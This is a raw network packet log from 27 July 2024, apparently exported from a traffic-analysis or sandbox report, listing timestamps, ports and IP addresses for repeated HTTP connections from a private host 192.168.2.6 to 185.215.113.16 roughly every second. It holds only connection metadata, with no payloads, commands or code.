Jul 27, 2024 09:35:34.103075981 CEST	49748	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:34.103091002 CEST	80	49747	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:34.103146076 CEST	49747	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:34.107891083 CEST	80	49748	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:34.939901114 CEST	80	49748	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:34.940167904 CEST	49748	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:34.941046000 CEST	49748	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:34.946737051 CEST	80	49748	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:35.188143015 CEST	80	49748	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:35.188458920 CEST	49748	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:35.300616026 CEST	49748	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:35.300944090 CEST	49749	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:35.305927038 CEST	80	49749	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:35.306029081 CEST	49749	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:35.306158066 CEST	49749	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:35.306257010 CEST	80	49748	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:35.306312084 CEST	49748	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:35.311084032 CEST	80	49749	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:36.089206934 CEST	80	49749	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:36.089417934 CEST	49749	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:36.090303898 CEST	49749	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:36.095535994 CEST	80	49749	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:36.343741894 CEST	80	49749	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:36.343892097 CEST	49749	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:36.456968069 CEST	49749	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:36.457127094 CEST	49750	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:36.464809895 CEST	80	49750	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:36.464968920 CEST	49750	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:36.465075016 CEST	49750	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:36.465842962 CEST	80	49749	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:36.465992928 CEST	49749	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:36.471978903 CEST	80	49750	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:37.226320982 CEST	80	49750	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:37.226697922 CEST	49750	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:37.227679968 CEST	49750	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:37.234174967 CEST	80	49750	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:37.488029957 CEST	80	49750	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:37.488181114 CEST	49750	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:37.597734928 CEST	49750	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:37.598043919 CEST	49752	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:37.603466988 CEST	80	49752	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:37.603673935 CEST	49752	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:37.603837013 CEST	49752	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:37.605254889 CEST	80	49750	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:37.605335951 CEST	49750	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:37.609200001 CEST	80	49752	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:38.357083082 CEST	80	49752	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:38.357297897 CEST	49752	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:38.360198975 CEST	49752	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:38.365462065 CEST	80	49752	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:38.608216047 CEST	80	49752	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:38.608436108 CEST	49752	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:38.722470045 CEST	49752	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:38.722754955 CEST	49753	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:38.729001999 CEST	80	49753	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:38.729166031 CEST	49753	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:38.729448080 CEST	49753	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:38.729572058 CEST	80	49752	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:38.729739904 CEST	49752	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:38.734637976 CEST	80	49753	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:39.525403976 CEST	80	49753	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:39.525527954 CEST	49753	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:39.526173115 CEST	49753	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:39.531081915 CEST	80	49753	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:39.781416893 CEST	80	49753	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:39.781480074 CEST	49753	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:39.894246101 CEST	49753	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:39.894536972 CEST	49754	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:39.903465033 CEST	80	49754	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:39.903563976 CEST	49754	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:39.903723001 CEST	49754	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:39.904104948 CEST	80	49753	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:39.904155016 CEST	49753	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:39.909049988 CEST	80	49754	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:40.645581961 CEST	80	49754	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:40.645992994 CEST	49754	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:40.646524906 CEST	49754	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:40.652760029 CEST	80	49754	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:40.894618988 CEST	80	49754	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:40.894783020 CEST	49754	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:41.003765106 CEST	49754	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:41.004053116 CEST	49755	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:41.009162903 CEST	80	49755	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:41.009366035 CEST	49755	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:41.009408951 CEST	49755	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:41.009558916 CEST	80	49754	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:41.009641886 CEST	49754	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:41.014659882 CEST	80	49755	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:41.798738956 CEST	80	49755	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:41.799237013 CEST	49755	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:41.800175905 CEST	49755	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:41.807018042 CEST	80	49755	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:42.064651966 CEST	80	49755	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:42.064959049 CEST	49755	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:42.175612926 CEST	49755	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:42.175894976 CEST	49756	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:42.181164026 CEST	80	49756	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:42.181720018 CEST	49756	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:42.181720972 CEST	49756	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:42.181735039 CEST	80	49755	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:42.181826115 CEST	49755	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:42.186887980 CEST	80	49756	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:42.935026884 CEST	80	49756	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:42.935132027 CEST	49756	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:42.935967922 CEST	49756	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:42.943761110 CEST	80	49756	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:43.186311960 CEST	80	49756	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:43.186465979 CEST	49756	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:43.300421953 CEST	49756	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:43.300719976 CEST	49757	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:43.305800915 CEST	80	49757	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:43.305886984 CEST	49757	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:43.305984974 CEST	49757	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:43.306245089 CEST	80	49756	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:43.306303978 CEST	49756	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:43.311084986 CEST	80	49757	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:44.055516958 CEST	80	49757	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:44.055805922 CEST	49757	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:44.056828022 CEST	49757	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:44.061875105 CEST	80	49757	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:44.306009054 CEST	80	49757	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:44.306116104 CEST	49757	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:44.410356998 CEST	49757	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:44.410753012 CEST	49758	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:44.415780067 CEST	80	49758	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:44.415997028 CEST	49758	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:44.415997028 CEST	49758	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:44.416086912 CEST	80	49757	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:44.416320086 CEST	49757	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:44.421181917 CEST	80	49758	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:45.193861961 CEST	80	49758	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:45.194087982 CEST	49758	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:45.194870949 CEST	49758	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:45.199852943 CEST	80	49758	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:45.441298962 CEST	80	49758	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:45.441380024 CEST	49758	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:45.552268982 CEST	49758	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:45.552592993 CEST	49759	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:45.557626963 CEST	80	49759	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:45.557714939 CEST	49759	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:45.557847023 CEST	49759	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:45.558151007 CEST	80	49758	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:45.558208942 CEST	49758	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:45.562777042 CEST	80	49759	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:46.307174921 CEST	80	49759	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:46.307259083 CEST	49759	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:46.307948112 CEST	49759	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:46.315682888 CEST	80	49759	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:46.558394909 CEST	80	49759	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:46.558531046 CEST	49759	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:46.675780058 CEST	49759	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:46.676103115 CEST	49760	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:46.681159973 CEST	80	49760	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:46.681226969 CEST	80	49759	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:46.681246042 CEST	49760	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:46.681274891 CEST	49759	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:46.681365013 CEST	49760	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:46.686156988 CEST	80	49760	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:47.552406073 CEST	80	49760	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:47.552480936 CEST	49760	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:47.553220987 CEST	49760	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:47.558094025 CEST	80	49760	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:47.800590038 CEST	80	49760	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:47.800951004 CEST	49760	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:47.910034895 CEST	49760	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:47.910211086 CEST	49761	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:47.915498018 CEST	80	49761	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:47.915608883 CEST	49761	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:47.915712118 CEST	49761	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:47.915744066 CEST	80	49760	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:47.915884972 CEST	49760	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:47.920727968 CEST	80	49761	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:48.660119057 CEST	80	49761	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:48.660182953 CEST	49761	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:48.662208080 CEST	49761	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:48.667156935 CEST	80	49761	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:48.908530951 CEST	80	49761	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:48.908673048 CEST	49761	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:49.019248009 CEST	49761	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:49.019570112 CEST	49762	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:49.025122881 CEST	80	49762	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:49.025223970 CEST	49762	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:49.025408030 CEST	49762	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:49.026696920 CEST	80	49761	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:49.026757956 CEST	49761	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:49.030368090 CEST	80	49762	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:49.774312973 CEST	80	49762	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:49.774383068 CEST	49762	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:49.775111914 CEST	49762	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:49.779956102 CEST	80	49762	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:50.024039030 CEST	80	49762	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:50.024144888 CEST	49762	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:50.128598928 CEST	49762	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:50.128993034 CEST	49763	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:50.134047031 CEST	80	49763	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:50.134134054 CEST	49763	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:50.134265900 CEST	49763	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:50.134840012 CEST	80	49762	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:50.134892941 CEST	49762	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:50.139163971 CEST	80	49763	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:51.257580042 CEST	80	49763	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:51.257821083 CEST	49763	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:51.258460999 CEST	49763	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:51.258527994 CEST	80	49763	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:51.258675098 CEST	49763	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:51.263567924 CEST	80	49763	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:51.511944056 CEST	80	49763	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:51.512183905 CEST	49763	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:51.628829002 CEST	49763	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:51.629050016 CEST	49764	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:51.634320021 CEST	80	49764	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:51.634442091 CEST	49764	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:51.634604931 CEST	49764	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:51.634831905 CEST	80	49763	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:51.634985924 CEST	49763	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:51.639874935 CEST	80	49764	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:52.373470068 CEST	80	49764	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:52.373682022 CEST	49764	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:52.376091003 CEST	49764	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:52.381532907 CEST	80	49764	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:52.621944904 CEST	80	49764	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:52.622133970 CEST	49764	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:52.737983942 CEST	49764	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:52.738269091 CEST	49765	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:52.743923903 CEST	80	49764	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:52.744039059 CEST	49764	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:52.744421959 CEST	80	49765	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:52.744587898 CEST	49765	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:52.744641066 CEST	49765	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:52.749788046 CEST	80	49765	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:53.527568102 CEST	80	49765	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:53.527672052 CEST	49765	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:53.528465033 CEST	49765	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:53.533315897 CEST	80	49765	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:53.781541109 CEST	80	49765	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:53.781748056 CEST	49765	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:53.894321918 CEST	49765	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:53.894646883 CEST	49766	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:53.902064085 CEST	80	49766	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:53.902306080 CEST	49766	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:53.902306080 CEST	49766	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:53.902914047 CEST	80	49765	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:53.903069019 CEST	49765	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:53.922771931 CEST	80	49766	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:54.759404898 CEST	80	49766	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:54.759462118 CEST	49766	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:54.760112047 CEST	49766	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:54.764914036 CEST	80	49766	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:55.006926060 CEST	80	49766	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:55.007060051 CEST	49766	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:55.115775108 CEST	49766	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:55.115998983 CEST	49767	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:55.121221066 CEST	80	49767	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:55.121345997 CEST	49767	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:55.121442080 CEST	49767	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:55.121982098 CEST	80	49766	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:55.122076035 CEST	49766	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:55.126549006 CEST	80	49767	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:55.870734930 CEST	80	49767	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:55.870812893 CEST	49767	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:55.871516943 CEST	49767	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:55.880161047 CEST	80	49767	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:56.121731043 CEST	80	49767	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:56.121937990 CEST	49767	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:56.237833977 CEST	49767	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:56.238173008 CEST	49768	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:56.244151115 CEST	80	49767	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:56.244268894 CEST	49767	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:56.245729923 CEST	80	49768	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:56.245903015 CEST	49768	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:56.246049881 CEST	49768	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:56.251300097 CEST	80	49768	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:57.011584044 CEST	80	49768	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:57.011651993 CEST	49768	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:57.012387037 CEST	49768	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:57.017859936 CEST	80	49768	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:57.263676882 CEST	80	49768	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:57.263937950 CEST	49768	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:57.380220890 CEST	49768	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:57.380418062 CEST	49769	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:57.385354042 CEST	80	49769	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:57.385459900 CEST	49769	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:57.385561943 CEST	49769	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:57.385699987 CEST	80	49768	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:57.385755062 CEST	49768	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:57.390347004 CEST	80	49769	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:58.130425930 CEST	80	49769	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:58.130640984 CEST	49769	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:58.131138086 CEST	49769	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:58.136006117 CEST	80	49769	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:58.376444101 CEST	80	49769	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:58.376800060 CEST	49769	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:58.488059044 CEST	49769	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:58.488285065 CEST	49770	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:58.493165016 CEST	80	49770	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:58.493359089 CEST	49770	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:58.493488073 CEST	49770	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:58.494457006 CEST	80	49769	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:58.494530916 CEST	49769	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:58.498322964 CEST	80	49770	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:59.263596058 CEST	80	49770	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:59.263678074 CEST	49770	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:59.264271021 CEST	49770	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:59.270744085 CEST	80	49770	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:59.557382107 CEST	80	49770	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:59.557466030 CEST	49770	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:59.659792900 CEST	49770	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:59.660082102 CEST	49771	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:59.665595055 CEST	80	49770	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:59.665667057 CEST	49770	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:59.671379089 CEST	80	49771	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:59.671452999 CEST	49771	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:59.671575069 CEST	49771	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:59.677934885 CEST	80	49771	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:00.445875883 CEST	80	49771	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:00.445949078 CEST	49771	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:00.446614027 CEST	49771	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:00.451729059 CEST	80	49771	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:00.698757887 CEST	80	49771	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:00.698851109 CEST	49771	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:00.800461054 CEST	49771	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:00.800776005 CEST	49772	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:00.806333065 CEST	80	49772	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:00.806428909 CEST	49772	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:00.806575060 CEST	49772	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:00.806962013 CEST	80	49771	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:00.807020903 CEST	49771	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:00.812129021 CEST	80	49772	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:01.551214933 CEST	80	49772	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:01.551307917 CEST	49772	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:01.576940060 CEST	49772	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:01.582045078 CEST	80	49772	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:01.822029114 CEST	80	49772	185.215.113.16	192.168.2.6
